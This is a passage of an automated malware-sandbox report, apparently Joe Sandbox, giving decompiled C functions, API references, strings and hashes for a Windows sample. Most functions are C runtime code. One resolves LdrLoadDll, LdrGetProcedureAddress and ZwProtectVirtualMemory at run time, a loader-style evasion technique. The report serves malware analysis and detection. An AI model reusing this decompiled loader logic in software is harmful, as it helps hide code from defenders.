0x00402d4c
0x00402d72
0x00402d72
0x00402d78
0x00402d87
0x00402d91
0x00402d96
0x00402dab
0x00402d98
0x00402da1
0x00402da6
0x00402db5
0x00000000
0x00000000
0x00000000
0x00000000
0x00402d4e
0x00402d4e
0x00402d4e
0x00402d52
0x00402d55
0x00000000
0x00000000
0x00402d5a
0x00402d62
0x00402d67
0x00402d6a
0x00402d6c
0x00402d6f
0x00402d70
0x00000000
0x00000000
0x00000000
0x00402d70
0x00000000
0x00402d4e

APIs

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000000,7734DAA3), ref: 00402D34
memcpy.NTDLL(?,00000000,00000000,0000000A,00000000,7734DAA3), ref: 00402DA1

Strings

AppDataLow, xrefs: 00402D81
May 27 2019, xrefs: 00402CFF

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: memcpy
String ID: AppDataLow$May 27 2019
API String ID: 3510742995-2970031298
Opcode ID: a1ef8a14d280ba8beecdada5c93925aaf3058ba9775b903bcb465d0ea49231d3
Instruction ID: e887b8d16995bac36a0f528bafa1535428367675affeb40b23152499f376d9eb
Opcode Fuzzy Hash: a1ef8a14d280ba8beecdada5c93925aaf3058ba9775b903bcb465d0ea49231d3
Instruction Fuzzy Hash: 8B418E72D042049BEF15CF94C988AAEB7B1AF54304F1980AADC047B3D6C3B89E55DB59

Uniqueness

Uniqueness Score: -1,00%

Function 00444A79, Relevance: 6.1, APIs: 4, Instructions: 96COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00444AAD
__isleadbyte_l.LIBCMT ref: 00444ADB
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000000,048B1FE1,00BFBBEF,00000000,?,00000000,00BFBBEF,?,00449D57,00000000,00BFBBEF,00000003), ref: 00444B09
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000000,00000001,00BFBBEF,00000000,?,00000000,00BFBBEF,?,00449D57,00000000,00BFBBEF,00000003), ref: 00444B3F

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 5048ded9b16c1a6da777314e5729ea581f38c73d9e1ef5227793d4eb9f28d922
Instruction ID: ef41390e29640943f0b1ec0a7d44cb64a9da290b17dd8242f0031fa8013872b4
Opcode Fuzzy Hash: 5048ded9b16c1a6da777314e5729ea581f38c73d9e1ef5227793d4eb9f28d922
Instruction Fuzzy Hash: F231E131600286AFEB21CF75CC45BBB7BA5FF81310F15402AE861A72A0E738E851DB58

Uniqueness

Uniqueness Score: -1,00%

Function 0043F01D, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043F01D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E0043F56A(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E0043F0A3(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E0043F7DF(_t28, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E0043F720(_t28, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x0043f020
0x0043f026
0x0043f099
0x00000000
0x0043f02d
0x0043f02d
0x0043f030
0x0043f04b
0x0043f04e
0x0043f06e
0x0043f080
0x0043f050
0x0043f050
0x0043f053
0x00000000
0x0043f055
0x0043f067
0x0043f067
0x0043f053
0x0043f09e
0x0043f0a2
0x0043f032
0x0043f04a
0x0043f04a
0x0043f030

APIs

__cftof_l.LIBCMT ref: 0043F041

Part of subcall function 0043F720: __fltout2.LIBCMT ref: 0043F749

__cftog_l.LIBCMT ref: 0043F067
__cftoe_l.LIBCMT ref: 0043F099

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: d2b4243a83bd7552c53c13882227dabf4826bf0c3b275abab590b3ee414900cc
Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: 54013D3280014EBBCF165E99CC018EE3F72BB1C354F589426FA1858132D33AC9B5AB85

Uniqueness

Uniqueness Score: -1,00%

Function 00436236, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E00436236(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __ebp;
				void* _t25;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				intOrPtr* _t31;
				void* _t33;

				_t30 = __esi;
				_t27 = __ebx;
				_t35 = _a28;
				_t29 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t29);
					_push(_a4);
					E0043686F(__ebx, _t29, __esi, _t35);
					_t33 = _t33 + 0x10;
				}
				_t36 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t29);
				}
				E004326EA(_t28);
				_push(_t30);
				_t31 = _a32;
				_push( *_t31);
				_push(_a20);
				_push(_a16);
				_push(_t29);
				L00436AD0(_t27, _t29, _t31, _t36);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t31 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t29);
				_push(_a4);
				_t25 = E00436028(_t27, _t29, _t31, _t36);
				if(_t25 != 0) {
					E004326BA(_t25, _t29);
					return _t25;
				}
				return _t25;
			}

0x00436236
0x00436236
0x00436239
0x0043623e
0x00436241
0x00436243
0x00436246
0x00436249
0x0043624a
0x0043624d
0x00436252
0x00436252
0x00436255
0x00436259
0x0043625c
0x00436261
0x0043625e
0x0043625e
0x0043625e
0x00436264
0x00436269
0x0043626a
0x0043626d
0x0043626f
0x00436272
0x00436275
0x00436276
0x0043627e
0x00436283
0x00436287
0x0043628d
0x00436290
0x00436293
0x00436296
0x00436297
0x0043629a
0x004362a5
0x004362a9
0x00000000
0x004362a9
0x004362b0

APIs

___BuildCatchObject.LIBCMT ref: 0043624D

Part of subcall function 0043686F: ___AdjustPointer.LIBCMT ref: 004368B8

_UnwindNestedFrames.LIBCMT ref: 00436264
___FrameUnwindToState.LIBCMT ref: 00436276
CallCatchBlock.LIBCMT ref: 0043629A

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: 72ce6d50bdbc0ed8e4e39baa9b8c52f7cbdb71ca9ed2d5d1ef4c4fc3d447ce6d
Instruction ID: 6bc489b0935278744ab95563875794c0823e71a6873fb20607a92396b4174378
Opcode Fuzzy Hash: 72ce6d50bdbc0ed8e4e39baa9b8c52f7cbdb71ca9ed2d5d1ef4c4fc3d447ce6d
Instruction Fuzzy Hash: F4011B32000109BBCF12AF56CC05EDB3B7AFF4C714F06901AFA5865120C779E861EBA8

Uniqueness

Uniqueness Score: -1,00%

Function 0043C0F2, Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0043C0F2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				LONG* _t20;
				signed int _t25;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t24 = __ebx;
				_push(0xc);
				_push(0x467ae0);
				E004391D0(__ebx, __edi, __esi);
				_t31 = L0043CC0F(__edi, _t35);
				_t25 =  *0x46a434; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					L00435DD9(_t29, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x469ce0; // 0x3235d0
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x469fe0;
								if(__eflags != 0) {
									E00431794(_t33);
								}
							}
						}
						_t20 =  *0x469ce0; // 0x3235d0
						 *(_t31 + 0x68) = _t20;
						_t33 =  *0x469ce0; // 0x3235d0
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E0043C18E();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					E004314EA(_t24, _t29, _t31, _t33, _t38, 0x20);
				}
				return E00439215(_t33);
			}

0x0043c0f2
0x0043c0f2
0x0043c0f2
0x0043c0f2
0x0043c0f4
0x0043c0f9
0x0043c103
0x0043c105
0x0043c10e
0x0043c12f
0x0043c135
0x0043c139
0x0043c13c
0x0043c13f
0x0043c145
0x0043c147
0x0043c149
0x0043c152
0x0043c154
0x0043c156
0x0043c15c
0x0043c15f
0x0043c164
0x0043c15c
0x0043c154
0x0043c165
0x0043c16a
0x0043c16d
0x0043c173
0x0043c177
0x0043c177
0x0043c17d
0x0043c184
0x0043c116
0x0043c116
0x0043c116
0x0043c119
0x0043c11b
0x0043c11f
0x0043c124
0x0043c12c

APIs

Part of subcall function 0043CC0F: __getptd_noexit.LIBCMT ref: 0043CC10

__lock.LIBCMT ref: 0043C12F
InterlockedDecrement.KERNEL32(?), ref: 0043C14C
_free.LIBCMT ref: 0043C15F
InterlockedIncrement.KERNEL32(003235D0), ref: 0043C177

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: 6e0c34e9e0d6cb1556112f00993391d55ae6b20544620741878c4af06ef8dc17
Instruction ID: 7cc36e47a9ed0d17a7e9a081b218495637a798bec6d470245f39fc39d259d744
Opcode Fuzzy Hash: 6e0c34e9e0d6cb1556112f00993391d55ae6b20544620741878c4af06ef8dc17
Instruction Fuzzy Hash: 1F01AD35900A11ABDF20BB66988975E73A0BF0CB54F14201BE81577292DBBC5C40EFDE

Uniqueness

Uniqueness Score: -1,00%

Function 00403235, Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00403235(signed int __edx, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v8;
				void* _v20;
				void* __esi;
				signed int _t5;
				signed int _t7;
				signed int _t10;
				signed int _t12;
				signed int _t15;
				signed int _t17;
				void* _t19;
				void* _t20;
				signed int _t21;
				void* _t22;
				void* _t23;

				_t21 = __edx;
				_t5 =  *0x4064e0; // 0x0
				_t23 = 0;
				if((_t5 |  *0x4064e4) == 0) {
					L3:
					_t23 = 0x7f;
					_push("LdrLoadDll");
					_push(_a8);
					_t7 = E004029F8(_t19, _t20, _t22, _t23, _t28);
					 *0x4064e0 = _t7;
					_t29 = _t7 | _t21;
					 *0x4064e4 = _t21;
					if((_t7 | _t21) != 0) {
						_push("LdrGetProcedureAddress");
						_push(_v0);
						_t10 = E004029F8(_t19, _t20, _t22, _t23, _t29);
						 *0x4064e8 = _t10;
						_t30 = _t10 | _t21;
						 *0x4064ec = _t21;
						if((_t10 | _t21) != 0) {
							_push("ZwProtectVirtualMemory");
							_push(_v8);
							_t12 = E004029F8(_t19, _t20, _t22, _t23, _t30);
							 *0x4064f0 = _t12;
							 *0x4064f4 = _t21;
							if((_t12 | _t21) != 0) {
								_t23 = 0;
								goto L7;
							}
						}
					}
				} else {
					_t15 =  *0x4064e8; // 0x0
					if((_t15 |  *0x4064ec) == 0) {
						goto L3;
					} else {
						_t17 =  *0x4064f0; // 0x0
						_t28 = _t17 |  *0x4064f4;
						if((_t17 |  *0x4064f4) != 0) {
							L7:
							memcpy(_v20, 0x4064e0, 0x18);
						} else {
							goto L3;
						}
					}
				}
				return _t23;
			}

0x00403235
0x00403235
0x0040323b
0x00403243
0x0040325f
0x00403261
0x00403262
0x00403267
0x0040326b
0x00403270
0x00403275
0x00403277
0x0040327d
0x0040327f
0x00403284
0x00403288
0x0040328d
0x00403292
0x00403294
0x0040329a
0x0040329c
0x004032a1
0x004032a5
0x004032aa
0x004032b1
0x004032b7
0x004032b9
0x00000000
0x004032b9
0x004032b7
0x0040329a
0x00403245
0x00403245
0x00403250
0x00000000
0x00403252
0x00403252
0x00403257
0x0040325d
0x004032bb
0x004032c6
0x00000000
0x00000000
0x00000000
0x0040325d
0x00403250
0x004032d1

APIs

memcpy.NTDLL(?,004064E0,00000018,?,ZwProtectVirtualMemory,?,LdrGetProcedureAddress,?,LdrLoadDll,?,00403455,?,?), ref: 004032C6

Strings

LdrGetProcedureAddress, xrefs: 0040327F
ZwProtectVirtualMemory, xrefs: 0040329C
LdrLoadDll, xrefs: 00403262

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: memcpy
String ID: LdrGetProcedureAddress$LdrLoadDll$ZwProtectVirtualMemory
API String ID: 3510742995-2710412950
Opcode ID: 081a486142203792f9e5ca6e7555fee68ea3358ecfd949f0496704d113a29aa3
Instruction ID: 7a6ee73056a02d97f5e7f64c09388c8ba0ceb58e8a97ad443f9006a4d082c7ae
Opcode Fuzzy Hash: 081a486142203792f9e5ca6e7555fee68ea3358ecfd949f0496704d113a29aa3
Instruction Fuzzy Hash: 8501B570620201ABC360EF15EF028467BD6B790B41B02483FB055B62F2D378A9249B5C

Uniqueness

Uniqueness Score: -1,00%

Function 0043CC96, Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 0043CCDA

Part of subcall function 00435DD9: __mtinitlocknum.LIBCMT ref: 00435DEB
Part of subcall function 00435DD9: EnterCriticalSection.KERNEL32(?,?,0043CCDF,0000000D), ref: 00435E04

InterlockedIncrement.KERNEL32(00469FE0), ref: 0043CCE7
__lock.LIBCMT ref: 0043CCFB
___addlocaleref.LIBCMT ref: 0043CD19

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
String ID:
API String ID: 1687444384-0
Opcode ID: f2d88100045406a1538ba214773d6d937c1b3480eb924c58f19fb54681a86519
Instruction ID: 60cf7d254a133776841cfcce10206dd8e385012f883824676e46de9428ec237f
Opcode Fuzzy Hash: f2d88100045406a1538ba214773d6d937c1b3480eb924c58f19fb54681a86519
Instruction Fuzzy Hash: 43016175440B00DFD7209F66D84674AB7F0AF58328F20991FE496977E1DBB8A540CF19

Uniqueness

Uniqueness Score: -1,00%

Function 0041AC00, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 383COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041B0E0

Strings

0, xrefs: 0041AF0E
Row has too many bytes to allocate in memory, xrefs: 0041B0B9

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: _memset
String ID: 0$Row has too many bytes to allocate in memory
API String ID: 2102423945-1110505568
Opcode ID: 25fa6f3fec1cd0100560ca10397dd8cbf0e8cc3afea05d8a1573e2389988d294
Instruction ID: b7f87cf6e055ff33cfd1c049aed89c5cda4eb1f4e29e27be9451a35bd031ab2b
Opcode Fuzzy Hash: 25fa6f3fec1cd0100560ca10397dd8cbf0e8cc3afea05d8a1573e2389988d294
Instruction Fuzzy Hash: 0B026F746002489FCB04CF54C494AEE7BB2FF88355F18C1AAE8995F356C7359AD1CB85

Uniqueness

Uniqueness Score: -1,00%

Function 00403319, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 327
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00403319(signed int __edi) {
				void* __ebx;
				void* __esi;
				intOrPtr _t159;
				void* _t168;
				char* _t170;
				void* _t175;
				signed int _t183;
				void* _t186;
				signed int _t193;
				void* _t205;
				void* _t207;
				signed int _t210;
				signed int _t211;
				signed int _t230;
				signed int _t232;
				void* _t235;
				void* _t240;
				void* _t256;
				signed int _t257;
				signed int _t268;
				signed int _t279;
				signed int _t280;
				intOrPtr* _t283;
				signed int _t288;
				void* _t289;
				signed int _t290;
				void* _t293;
				void* _t294;
				void* _t295;
				void* _t297;

				_t279 = __edi;
				E00432414(0x44ccbf, _t289);
				_t294 = _t293 - 0x558;
				_push(_t289);
				_t230 = 0;
				_push(0x28);
				 *((intOrPtr*)(_t294 + 0x14)) = 0;
				_t290 = E0043057C(0, __edi, _t297);
				 *((intOrPtr*)(_t294 + 0x14)) = _t290;
				 *(_t294 + 0x56c) =  *(_t294 + 0x56c) & 0;
				if(_t290 == 0) {
					_t290 = 0;
					__eflags = 0;
				} else {
					L00401B18(_t294 + 0x20, _t290, "root");
					_t230 = 1;
					 *((char*)(_t294 + 0x570)) = 1;
					 *((intOrPtr*)(_t294 + 0x14)) = 1;
					L00401AF5(_t290, _t294 + 0x1c);
					 *(_t290 + 0x1c) =  *(_t290 + 0x1c) & 0x00000000;
					 *(_t290 + 0x20) =  *(_t290 + 0x20) & 0x00000000;
					 *((char*)(_t290 + 0x24)) = 0;
				}
				 *(_t294 + 0x56c) =  *(_t294 + 0x56c) | 0xffffffff;
				if((_t230 & 0x00000001) != 0) {
					_t230 = _t230 & 0xfffffffe;
					L00401E67(_t294 + 0x1c);
				}
				_t283 =  *((intOrPtr*)(_t294 + 0x578));
				E00401979(_t294 + 0xbc, _t283, _t290, _t283, 1, 0x40, 1);
				 *((intOrPtr*)(_t294 + 0x578)) = 3;
				 *((intOrPtr*)(_t294 + 0x20)) = _t290;
				 *((char*)(_t294 + 0x170)) = 0;
				E004345E0(_t294 + 0x169, 0, 0x3ff);
				_t295 = _t294 + 0xc;
				_t235 = _t283 + 1;
				do {
					_t159 =  *_t283;
					_t283 = _t283 + 1;
				} while (_t159 != 0);
				if(_t283 != _t235) {
					E00407E91( *0x46ab28);
				}
				if( *((intOrPtr*)(_t295 +  *((intOrPtr*)( *((intOrPtr*)(_t295 + 0xac)) + 4)) + 0xb8)) != 0) {
					L55:
					E0040209A(_t295 + 0xac);
					 *[fs:0x0] =  *((intOrPtr*)(_t295 + 0x564));
					return _t290;
				} else {
					_push(_t279);
					do {
						_push(0);
						_t239 = E00404068(_t295 + 0xbc, _t295 + 0x170, 0x400);
						_t168 =  *((intOrPtr*)( *_t165 + 4)) + _t239;
						_t240 = 0;
						_t169 =  !=  ? _t240 : _t168;
						_t305 =  !=  ? _t240 : _t168;
						if(( !=  ? _t240 : _t168) == 0) {
							goto L53;
						}
						_t170 = _t295 + 0x168;
						do {
							_t170 = _t170 + 1;
						} while ( *_t170 != 0x2c);
						 *_t170 = 0;
						 *((intOrPtr*)(_t295 + 0x10)) = _t170 + 1;
						L00401B18(_t295 + 0x24, _t290, _t295 + 0x168);
						_t175 = E0040398A( *((intOrPtr*)(_t295 + 0x580)), _t295 + 0x20);
						L00401E67(_t295 + 0x20);
						if(_t175 == 0) {
							_push(0x28);
							_t280 = E0043057C(_t230, _t279, __eflags);
							 *(_t295 + 0x1c) = _t280;
							 *((char*)(_t295 + 0x570)) = 5;
							__eflags = _t280;
							if(_t280 == 0) {
								_t279 = 0;
								__eflags = 0;
							} else {
								L00401B18(_t295 + 0x6c, _t290, _t295 + 0x168);
								_t230 = _t230 | 0x00000002;
								 *((char*)(_t295 + 0x574)) = 6;
								 *(_t295 + 0x18) = _t230;
								L00401AF5(_t280, _t295 + 0x68);
								 *((intOrPtr*)(_t280 + 0x1c)) = 0;
								 *((intOrPtr*)(_t280 + 0x20)) = 0;
								 *((char*)(_t280 + 0x24)) = 0;
							}
							 *((intOrPtr*)(_t295 + 0x570)) = 3;
							__eflags = _t230 & 0x00000002;
							if((_t230 & 0x00000002) != 0) {
								_t230 = _t230 & 0xfffffffd;
								__eflags = _t230;
								L00401E67(_t295 + 0x68);
							}
							L00401B18(_t295 + 0x24, _t290, _t295 + 0x168);
							_push(_t295 + 0x20);
							 *((char*)(_t295 + 0x574)) = 8;
							 *(L00401F78( *((intOrPtr*)(_t295 + 0x580)))) = _t279;
							 *((char*)(_t295 + 0x570)) = 3;
							L00401E67(_t295 + 0x20);
							_t183 =  *(_t295 + 0x18);
							__eflags = _t183 - _t290;
							if(_t183 != _t290) {
								 *(_t183 + 0x20) = _t279;
							} else {
								 *(_t183 + 0x1c) = _t279;
							}
							 *(_t279 + 0x18) = _t183;
							 *(_t295 + 0x18) = _t279;
						} else {
							L00401B18(_t295 + 0x54, _t290, _t295 + 0x168);
							_push(_t295 + 0x50);
							 *((char*)(_t295 + 0x574)) = 4;
							_t279 =  *(L00401F78( *((intOrPtr*)(_t295 + 0x580))));
							 *((char*)(_t295 + 0x570)) = 3;
							L00401E67(_t295 + 0x50);
						}
						L00401B18(_t295 + 0x24, _t290,  *((intOrPtr*)(_t295 + 0x10)));
						_t186 = E0040398A( *((intOrPtr*)(_t295 + 0x580)), _t295 + 0x20);
						L00401E67(_t295 + 0x20);
						if(_t186 == 0) {
							_push(0x28);
							_t288 = E0043057C(_t230, _t279, __eflags);
							 *(_t295 + 0x1c) = _t288;
							 *((char*)(_t295 + 0x570)) = 0xf;
							__eflags = _t288;
							if(_t288 == 0) {
								_t288 = 0;
								__eflags = 0;
							} else {
								L00401B18(_t295 + 0x3c, _t290,  *((intOrPtr*)(_t295 + 0x10)));
								_t230 = _t230 | 0x00000010;
								 *((char*)(_t295 + 0x574)) = 0x10;
								 *(_t295 + 0x18) = _t230;
								L00401AF5(_t288, _t295 + 0x38);
								 *((intOrPtr*)(_t288 + 0x1c)) = 0;
								 *(_t288 + 0x20) = 0;
								 *((char*)(_t288 + 0x24)) = 0;
							}
							 *((intOrPtr*)(_t295 + 0x570)) = 3;
							__eflags = _t230 & 0x00000010;
							if((_t230 & 0x00000010) != 0) {
								_t230 = _t230 & 0xffffffef;
								__eflags = _t230;
								L00401E67(_t295 + 0x38);
							}
							L00401B18(_t295 + 0x3c, _t290,  *((intOrPtr*)(_t295 + 0x10)));
							_push(_t295 + 0x38);
							 *((char*)(_t295 + 0x574)) = 0x12;
							 *(L00401F78( *((intOrPtr*)(_t295 + 0x580)))) = _t288;
							 *((char*)(_t295 + 0x570)) = 3;
							_t256 = _t295 + 0x38;
							goto L46;
						} else {
							L00401B18(_t295 + 0x24, _t290,  *((intOrPtr*)(_t295 + 0x10)));
							_push(_t295 + 0x20);
							 *((char*)(_t295 + 0x574)) = 9;
							_t288 =  *(L00401F78( *((intOrPtr*)(_t295 + 0x580))));
							 *((char*)(_t295 + 0x570)) = 3;
							L00401E67(_t295 + 0x20);
							if( *((char*)(_t288 + 0x24)) != 0) {
								_push(0x28);
								_t288 = E0043057C(_t230, _t279, __eflags);
								 *(_t295 + 0x1c) = _t288;
								 *((char*)(_t295 + 0x570)) = 0xa;
								__eflags = _t288;
								if(_t288 == 0) {
									_t288 = 0;
									__eflags = 0;
								} else {
									_t205 = L00401B18(_t295 + 0x84, _t290,  *((intOrPtr*)(_t295 + 0x10)));
									_t232 = _t230 | 0x00000004;
									 *((char*)(_t295 + 0x57c)) = 0xb;
									 *(_t295 + 0x20) = _t232;
									_t207 = E00401337(_t295 + 0x84, _t295 + 0xa0, _t205, "*");
									_t295 = _t295 + 0xc;
									_t230 = _t232 | 0x00000008;
									 *((intOrPtr*)(_t295 + 0x574)) = 0xc;
									 *(_t295 + 0x18) = _t230;
									L00401AF5(_t288, _t207);
									 *((intOrPtr*)(_t288 + 0x1c)) = 0;
									 *(_t288 + 0x20) = 0;
									 *((char*)(_t288 + 0x24)) = 0;
								}
								__eflags = _t230 & 0x00000008;
								if((_t230 & 0x00000008) != 0) {
									_t230 = _t230 & 0xfffffff7;
									__eflags = _t230;
									L00401E67(_t295 + 0x98);
								}
								 *((intOrPtr*)(_t295 + 0x570)) = 3;
								__eflags = _t230 & 0x00000004;
								if((_t230 & 0x00000004) == 0) {
									L47:
									_t193 =  *(_t279 + 0x1c);
									if(_t193 != 0) {
										while(1) {
											_t257 =  *(_t193 + 0x20);
											__eflags = _t257;
											if(_t257 == 0) {
												break;
											}
											_t193 = _t257;
											__eflags = _t193;
											if(_t193 != 0) {
												continue;
											}
											break;
										}
										 *(_t193 + 0x20) = _t288;
										 *(_t288 + 0x18) = _t193;
										L52:
										 *((char*)(_t288 + 0x24)) = 1;
										goto L53;
									}
									 *(_t279 + 0x1c) = _t288;
									 *(_t288 + 0x18) = _t279;
									goto L52;
								} else {
									_t230 = _t230 & 0xfffffffb;
									_t256 = _t295 + 0x80;
									L46:
									L00401E67(_t256);
									goto L47;
								}
							}
							_t268 =  *(_t288 + 0x18);
							_t210 =  *(_t288 + 0x20);
							if( *(_t268 + 0x20) != _t288) {
								 *(_t268 + 0x1c) = _t210;
							} else {
								 *(_t268 + 0x20) = _t210;
							}
							_t211 =  *(_t288 + 0x20);
							if(_t211 == 0) {
								 *(_t295 + 0x18) =  *(_t288 + 0x18);
							} else {
								 *(_t211 + 0x18) = _t268;
								 *(_t288 + 0x20) =  *(_t288 + 0x20) & 0x00000000;
							}
							goto L47;
						}
						L53:
					} while ( *((intOrPtr*)(_t295 +  *((intOrPtr*)( *((intOrPtr*)(_t295 + 0xb0)) + 4)) + 0xbc)) == 0);
					goto L55;
